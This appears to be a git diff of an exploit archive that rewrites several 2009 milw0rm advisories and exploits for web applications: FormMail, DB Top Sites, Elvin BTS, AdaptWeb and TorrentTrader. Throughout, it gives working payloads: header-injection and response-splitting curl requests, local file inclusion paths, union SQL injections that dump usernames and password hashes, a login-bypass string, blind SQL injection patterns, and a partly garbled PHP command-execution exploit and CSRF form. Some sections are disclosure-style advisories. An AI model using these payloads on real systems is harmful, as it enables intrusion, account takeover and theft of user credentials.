+This XSS is not automatic.
+
+C) HTTP Response Header Injection
+
+An HTTP Response Header Injection vulnerability exists, the following 
+request triggers the vulnerability:
+
+$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub
+ject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3
+DHTTPHeaderInjection;" 
+
+Can be verified with the obvious "javascript:alert(document.cookie)".
+
+D) HTTP Response Splitting
+
+Thanks to the full exploitability of the Header Injection vulnerability
+an HTTP Response Splitting can be performed.
+
+The following request is an example of the attack:
+
+http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire
+ct=http://www.ush.it%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20te
+xt/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Typ
+e:%20text/plain%0D%0Ahttp://www.ush.it
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub
+ject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/p
+lain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%2
+0text/plain%0D%0Ahttp://www.ush.it"
+HTTP/1.1 302 Found
+Date: Sun, 12 Apr 2009 23:01:18 GMT
+Server: Apache
+Content-Length: 0
+Location:
+Transfer-Encoding: chunked
+Content-Type: text/plain
+
+HTTP/1.1 200 OK
+Content-Type: text/plain
+http://www.ush.it
+
+--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
+
+HTTP Response Splitting can be used to trigger a number of different
+vectors, ranging from automatic Reflected XSS to Browser and Proxy 
+Cache Poisoning.
+
+IV. DETECTION
+
+FormMail 1.92 and possibly earlier versions are vulnerable.
+
+V. WORKAROUND
+
+VI. VENDOR RESPONSE
+
+VII. CVE INFORMATION
+
+No CVE at this time.
+
+VIII. DISCLOSURE TIMELINE
+
+20070501 Bug discovered
+20070531 Initial vendor contact (Thu, 31 May 2007 22:21:39 +0200)
+-- No response and the bug sleeped for some time in ascii's mind --
+20090505 Second vendor contact
+-- Giving up, will have better results with forced disclosure --
+20090511 Advisory Release
+
+IX. CREDIT
+
+Francesco "ascii" Ongaro, Giovanni "evilaliv3" Pellerano and Antonio 
+"s4tan" Parata are credited with the discovery of this vulnerability.
+
+Francesco "ascii" Ongaro
+web site: http://www.ush.it/
+mail: ascii AT ush DOT it
+
+Giovanni "evilaliv3" Pellerano
+web site: http://www.evilaliv3.org
+mail: giovanni.pellerano AT evilaliv3 DOT org
+
+Antonio "s4tan" Parata
+web site: http://www.ictsc.it/
+mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
+
+X. LEGAL NOTICES
+
+Copyright (c) 2009 Francesco "ascii" Ongaro
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8951.php b/platforms/php/webapps/8951.php
index 8280ea64d..48449c14f 100755
--- a/platforms/php/webapps/8951.php
+++ b/platforms/php/webapps/8951.php
@@ -1,163 +1,163 @@
-";
-$fp = fopen($filename, 'a+');
-fputs($fp, $html) or die("Could not open file!");
-
----------------------------------
-
-We see how data is added in the file,the variables
-including our evil code.
-
-So if we register as an user with the location :
-
-\";?>
----------------------------------
-
-So we can succesfully execute our commands.
-
-------------------------------------------------------------
-
-[+] Notes 
-
-You can change my PHP code ( $codphp ) with what you want.
-Example : 
-
-$codphp = "\";?>Click here to go back and execute another command

    ";
-print "Command result: 

    " . nl2br($result) . "

    ";
-}
-
-else
-{
-
-?>
-
-
-Site: 
    
-Command: 

    
-
-
    
-
-
-
-# milw0rm.com [2009-06-15]
+";
+$fp = fopen($filename, 'a+');
+fputs($fp, $html) or die("Could not open file!");
+
+---------------------------------
+
+We see how data is added in the file,the variables
+including our evil code.
+
+So if we register as an user with the location :
+
+\";?>
+---------------------------------
+
+So we can succesfully execute our commands.
+
+------------------------------------------------------------
+
+[+] Notes 
+
+You can change my PHP code ( $codphp ) with what you want.
+Example : 
+
+$codphp = "\";?>Click here to go back and execute another command

    ";
+print "Command result: 

    " . nl2br($result) . "

    ";
+}
+
+else
+{
+
+?>
+
+
    
+Site: 
    
+Command: 

    
+
+
    
+
+
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8952.txt b/platforms/php/webapps/8952.txt
index 9f3acda85..a36b3b3a3 100755
--- a/platforms/php/webapps/8952.txt
+++ b/platforms/php/webapps/8952.txt
@@ -1,30 +1,30 @@
-######################################################################
-[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
-[+] Discovered By SirGod 
-[+] www.mortal-team.org
-#######################################################################
-
-[+] Local File Inclusion
-
- - Vulnerable code is everywhere
-
--------------------------------------------------------------------------------------------------------
-if ( $u != "" ) {
-
-if ( file_exists( "./sites/session/$u.session.php" ) ){
-include "./sites/session/$u.session.php";
-include "./sites/$u.php";
--------------------------------------------------------------------------------------------------------
-
-- PoC's
-
-    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00
-
-    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00
-
-    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00
-
-
-#######################################################################
-
-# milw0rm.com [2009-06-15]
+######################################################################
+[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
+[+] Discovered By SirGod 
+[+] www.mortal-team.org
+#######################################################################
+
+[+] Local File Inclusion
+
+ - Vulnerable code is everywhere
+
+-------------------------------------------------------------------------------------------------------
+if ( $u != "" ) {
+
+if ( file_exists( "./sites/session/$u.session.php" ) ){
+include "./sites/session/$u.session.php";
+include "./sites/$u.php";
+-------------------------------------------------------------------------------------------------------
+
+- PoC's
+
+    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00
+
+    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00
+
+    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00
+
+
+#######################################################################
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8953.txt b/platforms/php/webapps/8953.txt
index edfe0d15e..9b6d72fdd 100755
--- a/platforms/php/webapps/8953.txt
+++ b/platforms/php/webapps/8953.txt
@@ -1,130 +1,130 @@
-#################################################################################################################
-[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
-[+] Discovered By SirGod 
-[+] www.mortal-team.org
-#################################################################################################################
-
-- Script Homepage : http://www.elvinbts.org/
-- Google Dork : Powered by Elvin Bug Tracking Server.
-
-Elvin BTS suffers from a lot of vunerabilities
-
-1) SQL Injection
-2) Local File Inclusion
-3) SQL Injection Login Bypass
-4) Cross-Site Scripting
-5) Cross-Site Request Forgery
-6) Source Code Disclosure
-
-
------------------------ 1) SQL Injection ----------------------- 
-
-- Vulnerable code is everywhere.I will present only 2 PoC's.
-
- a) Vulnerable code in show_bug.php
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
- - PoC 
-
-     http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--
-
-  b) Vulnerable code in show_activity.php
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
- - PoC 
-
-     http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--
-
-
------------------------ 2) Local File Inclusion ----------------------- 
-
-- Vulnerable code in page.php
-
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-$filename = "pages/".$_GET['id'];
-................................................
-if(file_exists($filename)){
-include($filename);
-} else {
-echo "
    Sorry page cannot be found!
    ";
-}
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
- - PoC 
-
-       http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK
-
-
-
------------------------ 3) SQL Injection Login Bypass----------------------- 
-
-- Code in login.php ( in login.php is included the vulnerable code)
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-include(LoadElvinModule('login.ei'));
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
-
-- Vulnerable code in inc/login.ei
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
- - PoC 
-
-Login as :
-  
- Username : 'or''='
- Password : 'or''='
-
-
------------------------ 4) Cross-Site Scripting----------------------- 
-
-It's more XSS's in the script,but tired to find them all.
-
-- Vulnerable code in show_activity.php
-
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
    Back to bug # 
    
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
- - PoC
-
-    http://127.0.0.1/[path]/show_activity.php?id=
-
-
-
------------------------ 5) Cross-Site Request Forgery----------------------- 
-
-Logout CSRF
-
- - PoC
-
-   http://127.0.0.1/[path]/login.php?logout
-
-
-
------------------------ 6) Source Code Disclosure----------------------- 
-
-Go to /inc/ directory.You will se .ei files with php code inside.
-That files are included and used by the script.
-
- - PoC's
-
-    http://127.0.0.1/[path]/inc/login.ei
-    http://127.0.0.1/[path]/inc/jump_bug.ei
-    http://127.0.0.1/[path]/inc/create_account.ei
-
-Etc..
-
-############################################### EOF ##################################################
-
-# milw0rm.com [2009-06-15]
+#################################################################################################################
+[+] Elvin BTS 1.2.0 Multiple Remote VUlnerabilities
+[+] Discovered By SirGod 
+[+] www.mortal-team.org
+#################################################################################################################
+
+- Script Homepage : http://www.elvinbts.org/
+- Google Dork : Powered by Elvin Bug Tracking Server.
+
+Elvin BTS suffers from a lot of vunerabilities
+
+1) SQL Injection
+2) Local File Inclusion
+3) SQL Injection Login Bypass
+4) Cross-Site Scripting
+5) Cross-Site Request Forgery
+6) Source Code Disclosure
+
+
+----------------------- 1) SQL Injection ----------------------- 
+
+- Vulnerable code is everywhere.I will present only 2 PoC's.
+
+ a) Vulnerable code in show_bug.php
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+$query_bug = sprintf("SELECT * FROM " .$prefix_db. "_bug WHERE bg_id_pk=" .$_GET['id']. " AND bg_deleted_dt IS NULL");
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+ - PoC 
+
+     http://127.0.0.1/[path]/show_bug.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+eb_profile--
+
+  b) Vulnerable code in show_activity.php
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+$query_activity = sprintf("SELECT * FROM " .$prefix_db. "_activity WHERE ay_bugid_fk=" .$_GET['id']. "");
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+ - PoC 
+
+     http://127.0.0.1/[path]/show_activity.php?id=null+union+all+select+1,2,3,4,concat_ws(0x3a,ac_user_vc,ac_pass_vc),6,7,8+from+eb_profile--
+
+
+----------------------- 2) Local File Inclusion ----------------------- 
+
+- Vulnerable code in page.php
+
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+$filename = "pages/".$_GET['id'];
+................................................
+if(file_exists($filename)){
+include($filename);
+} else {
+echo "
    Sorry page cannot be found!
    ";
+}
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+ - PoC 
+
+       http://127.0.0.1/[path]/page.php?id=../../../../../../BOOTSECT.BAK
+
+
+
+----------------------- 3) SQL Injection Login Bypass----------------------- 
+
+- Code in login.php ( in login.php is included the vulnerable code)
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+include(LoadElvinModule('login.ei'));
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+
+- Vulnerable code in inc/login.ei
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+$query_login = sprintf("SELECT * FROM " .$prefix_db. "_profile WHERE ac_user_vc='" .$_POST['inUser']. "' AND ac_pass_vc='" .$_POST['inPass']. "'");
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+ - PoC 
+
+Login as :
+  
+ Username : 'or''='
+ Password : 'or''='
+
+
+----------------------- 4) Cross-Site Scripting----------------------- 
+
+It's more XSS's in the script,but tired to find them all.
+
+- Vulnerable code in show_activity.php
+
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
    Back to bug # 
    
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+ - PoC
+
+    http://127.0.0.1/[path]/show_activity.php?id=
+
+
+
+----------------------- 5) Cross-Site Request Forgery----------------------- 
+
+Logout CSRF
+
+ - PoC
+
+   http://127.0.0.1/[path]/login.php?logout
+
+
+
+----------------------- 6) Source Code Disclosure----------------------- 
+
+Go to /inc/ directory.You will se .ei files with php code inside.
+That files are included and used by the script.
+
+ - PoC's
+
+    http://127.0.0.1/[path]/inc/login.ei
+    http://127.0.0.1/[path]/inc/jump_bug.ei
+    http://127.0.0.1/[path]/inc/create_account.ei
+
+Etc..
+
+############################################### EOF ##################################################
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8954.txt b/platforms/php/webapps/8954.txt
index 0042b6c40..95ab4b6a9 100755
--- a/platforms/php/webapps/8954.txt
+++ b/platforms/php/webapps/8954.txt
@@ -1,27 +1,26 @@
-
-#################################################################################################################
-[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
-[+] Script : http://adaptweb.sourceforge.net/
-[+] Discovered By SirGod 
-[+] www.mortal-team.org
-#################################################################################################################
-
-[+] Script homepage : http://adaptweb.sourceforge.net/
-
-[+] Local File Inclusion
-
-- PoC 
-
-   http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00
-
-
-[+] SQL Injection
-
-- PoC
-
-   http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
-
-#################################################################################################################
-
-
-# milw0rm.com [2009-06-15]
+#################################################################################################################
+[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
+[+] Script : http://adaptweb.sourceforge.net/
+[+] Discovered By SirGod 
+[+] www.mortal-team.org
+#################################################################################################################
+
+[+] Script homepage : http://adaptweb.sourceforge.net/
+
+[+] Local File Inclusion
+
+- PoC 
+
+   http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00
+
+
+[+] SQL Injection
+
+- PoC
+
+   http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
+
+#################################################################################################################
+
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8956.htm b/platforms/php/webapps/8956.htm
index 87b01f00c..f70abfb52 100755
--- a/platforms/php/webapps/8956.htm
+++ b/platforms/php/webapps/8956.htm
@@ -1,38 +1,38 @@
-
-
    
-enter password to change it in admin :D 
    
-
    
-
-
-
-
-
-
-
-
-
-
-
-
    Password : 
    
-
-
    
-
-
     
    
-
    
-
-# milw0rm.com [2009-06-15]
+
+
    
+enter password to change it in admin :D 
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
    Password : 
    
+
+
    
+
+
     
    
+
    
+
+# milw0rm.com [2009-06-15]
diff --git a/platforms/php/webapps/8958.txt b/platforms/php/webapps/8958.txt
index f0e1ac784..ad2610e5c 100755
--- a/platforms/php/webapps/8958.txt
+++ b/platforms/php/webapps/8958.txt
@@ -1,674 +1,674 @@
-[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09
-===============================================================================
-
-Author: Janek Vind "waraxe"
-Date: 15. June 2009
-Location: Estonia, Tartu
-Web: http://www.waraxe.us/advisory-74.html
-
-
-Description of vulnerable software:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
-BitTorrent tracker. Featuring integrated forums and plenty of administration
-options. Please visit www.torrenttrader.org for the support forums.
-
-http://sourceforge.net/projects/torrenttrader 
-
-
-List of found vulnerabilities
-===============================================================================
-
-1. Sql Injection vulnerability in "account-inbox.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "origmsg" is used in sql query
-Preconditions:
-  1. attacker must be logged in as valid user
-
-Test:
-
-http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
-
-Result: "MYSQL Error has occurred!"
-
------------------------------[source code start]-------------------------------
-if ($msg) {
-  $msg = trim($msg);
-
-  $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
-  $user = mysql_fetch_assoc($res);
-  if (!$user)
-    $message = "Username not found.";
-...
-
-    if ($origmsg && $delete == "yes")
-       mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();
------------------------------[source code end]---------------------------------
-
-
-2. Weak password generation algorithm in "account-recover.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. generated password is weak and can be easily bruteforced
-Preconditions:
-  1. attacker must know email address associated with target's account
-
-Torrenttrader contains password reseting functionality:
-
-http://localhost/torrenttrader109/account-recover.php
-
-Anyone can initiate password reset, only condition is, that target's email
-address must be know. Torrenttrader will check email address and after successful
-validation new, temporal password will be generated and sent to that email address.
-Specific autogenerated password appears to be random number between 10000 and 50000,
-so basically there can be only 40000 possible temporal passwords. It's easy to
-write bruteforce script, which will try all possible password combinations.
-This process can take couple of hours or more, but eventually the password will
-be guessed and target account becomes compromised.
-
------------------------------[source code start]-------------------------------
-if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {
-  $email = trim($_POST["email"]);
-  if (!validemail($email)) {
-	$msg = "" . NOT_VAILD_EMAIL . "";
-	$kind = "Error";
-  }
-  else {
-	  $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");
-	  $arr = mysql_fetch_assoc($res);
-
-	  if (!$arr) {
-	    $msg = "" . EMAIL_INVALID . "";
-	    $kind = "Error";
-	  }
-...
-	  if ($arr) {
-	  	$newpassword = rand(10000, 50000);
-	  	$md5pass = md5($newpassword);
------------------------------[source code end]---------------------------------
-
-
-3. Unauthorized database backup vulnerability in "backup-database.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. missing access control
-Preconditions:
-  1. mysqldump utility must be available
-  2. gzip utility must be available
-  3. target directory must be writable
-  4. database name must be known in order to successfully guess archive filename
-
-Test:
-
-http://localhost/torrenttrader109/backup-database.php
-
-Resulting message: "Database backup successful, entry inserted into database."
-
------------------------------[source code start]-------------------------------
-system(sprintf(    
-  'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',                                    
-  $host,
-  $user,
-  $pass,
-  $db,
-  getenv('DOCUMENT_ROOT'),
-  $backupdir,
-  $db,
-  $day,
-  $month,
-  $year
- )); 
------------------------------[source code end]---------------------------------
-
-Attacker is able to create database backup and resulting "gz" archive's
-filename can be guessed, if attacker knows database name. This file is also
-directly downloadable from website. Example download URI:
-
-http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz
-
-As result information leakage exists. For example, attacker can fetch admin
-credentials from backed up database.
-
-
-4. Sql Injection vulnerability in "browse.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. uninitialized variable "wherecatin" is used in sql query
-Preconditions:
-  1. none
-
-Test:
-
-http://localhost/torrenttrader109/browse.php?wherecatin=waraxe
-
-Result:
-
-Unknown column 'waraxe' in 'where clause'
-
------------------------------[source code start]-------------------------------
-if (count($wherecatina) > 1)
-$wherecatin = implode(",",$wherecatina);
-elseif (count($wherecatina) == 1)
-$wherea[] = "category = $wherecatina[0]";
-...
-if ($wherecatin)
-$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";
-
-if ($where != "")
-$where = "WHERE $where";
-
-$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
------------------------------[source code end]---------------------------------
-
-This specific sql injection vulneraility can be exploited using blind attack
-methods. If there is one or more active torrents in database, then usable is
-attack pattern below:
-
-http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
-
-and we see found torrents.
-
-http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1
-
-"No torrents were found based on your search criteria."
-
-In this way attacker is able to ask boolean questions from database and retrieve
-needed information bit by bit - example of classical blind sql injection.
-
-If there is no active torrents in database, then induced sql errors method can be used.
-
-http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
-
-"Subquery returns more than 1 row"
-
-http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
-
-"No torrents were found based on your search criteria."
-
-
-5. Information leakage in "check.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. missing access control
-Preconditions:
-  1. none
-
-Test:
-
-http://localhost/torrenttrader109/check.php
-
-This script is originally meant to be used by installer and lately by admins.
-Because of lacking access control attacker is able to use it for gathering some
-useful information about target system - full path to webroot, file and directory
-permissions of specific files, couple of php settings.
-
-6. Sql Injection vulnerability in "delreq.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "categ" is used in sql query
-Preconditions:
-  1. attacker must have at least super moderator privileges (user class > 3)
-Comments:
-  1. very easy to exploit
-
-Test:
-
-http://localhost/torrenttrader109/delreq.php?categ=waraxe
-
-Result:
-
-You have an error in your SQL syntax; check the manual that corresponds to your
-MySQL server version for the right syntax to use near
-'waraxe order by requests.request LIMIT 0,50' at line 1
-
-Test 2:
-
-http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
-
-and we can see all usernames, password hashes and emails from database.
-
-
-7. Sql Injection vulnerability in "index.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "choice" is used in sql query
-Preconditions:
-  1. attacker must be logged in as valid user
-  2. there must exist at least one poll
-
-Testing needs custom written html form:
--------------------------------------------------------------------------------
-
    
-
    
-
-
-
    
--------------------------------------------------------------------------------
-
-Result: "MYSQL Error has occurred!"
-
------------------------------[source code start]-------------------------------
-if ($_SERVER["REQUEST_METHOD"] == "POST")
-{
-  $choice = $_POST["choice"];
-  if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))
-  {
-    $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();
-    $arr = mysql_fetch_assoc($res) or die("No poll");
-    $pollid = $arr["id"];
-    $userid = $CURUSER["id"];
-    $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();
-    $arr = mysql_fetch_assoc($res);
-    if ($arr) die("Dupe vote");
-    mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();
------------------------------[source code end]---------------------------------
-
-
-8. Sql Injection vulnerability in "modrules.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "id" is used in sql query
-Preconditions:
-  1. attacker must have at least moderator privileges
-
-Testing needs custom written html form:
--------------------------------------------------------------------------------
-
    
-
    
-
-
-
-
-
-
-
    
--------------------------------------------------------------------------------
-
-Test result: "MYSQL Error has occurred!"
-
------------------------------[source code start]-------------------------------
-elseif ($_GET["act"]=="edited"){
-$id = $_POST["id"];
-$title = sqlesc($_POST["title"]);
-$text = sqlesc($_POST["text"]);
-$public = sqlesc($_POST["public"]);
-$class = sqlesc($_POST["class"]);
-mysql_query("update rules set title=$title, text=$text, public=$public,
-  class=$class where id=$id") or sqlerr(__FILE__,__LINE__);
------------------------------[source code end]---------------------------------
-  
-
-9. Information leakage in "phpinfo.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. missing access control
-Preconditions:
-  1. none
-
-Test:
-
-http://localhost/torrenttrader109/phpinfo.php
-
------------------------------[source code start]-------------------------------
-
------------------------------[source code end]---------------------------------
-
-This script can be used by attacker to obtain information from php function
-phpinfo(). Access to such script must be limited to admins, but currently there
-is not any access control at all.
-
-
-10. Sql Injection vulnerabilities in "report.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "user" is used in sql query
-  2. unsanitized user submitted parameter "torrent" is used in sql query
-  3. unsanitized user submitted parameter "forumid" is used in sql query
-  4. unsanitized user submitted parameter "forumpost" is used in sql query
-Preconditions:
-  1. attacker must be logged in as valid user
-
-Two proof-of-concept tests below are using parameter "user".
-
-Test 1 needs custom written html form:
--------------------------------------------------------------------------------
-
    
-
    
-
-
-
-
    
--------------------------------------------------------------------------------
-
-Test result: "MYSQL Error has occurred!"
-
-Test 2 needs custom written html form:
------------------------------[source code start]-------------------------------
-
    
-
    
-
-
-
-
    
------------------------------[source code end]---------------------------------
-  
-Test result: "You have already reported user ..."
-
-It's classical blind sql injection exploitation method and allows attacker to
-fetch information from database bit by bit by asking boolean questions.
-
-Other three sql injection vulnerabilities in "report.php" involve user submitted
-parameters "torrent", "forumid" and "forumpost" and exploitation can be done in
-similar way as seen above.
-
-
-11. Sql Injection vulnerability in "take-deletepm.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "delmp" is used in sql query
-Preconditions:
-  1. attacker must have admin privileges
-
------------------------------[source code start]-------------------------------
-if(isset($_POST["delmp"])) {
-	$do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";
-	$res=mysql_query($do)
------------------------------[source code end]---------------------------------
-
-
-12. Sql Injection vulnerability in "takedelreport.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
-  1. unsanitized user submitted parameter "delreport" is used in sql query
-Preconditions:
-  1. attacker must have at least moderator privileges
-
------------------------------[source code start]-------------------------------
-jmodonly();
-
-$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 
-  AND id IN (" . implode(", ", $_POST[delreport]) . ")");
------------------------------[source code end]---------------------------------
-
-
-13. Sql Injection vulnerability in "takedelreq.php"
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Reasons:
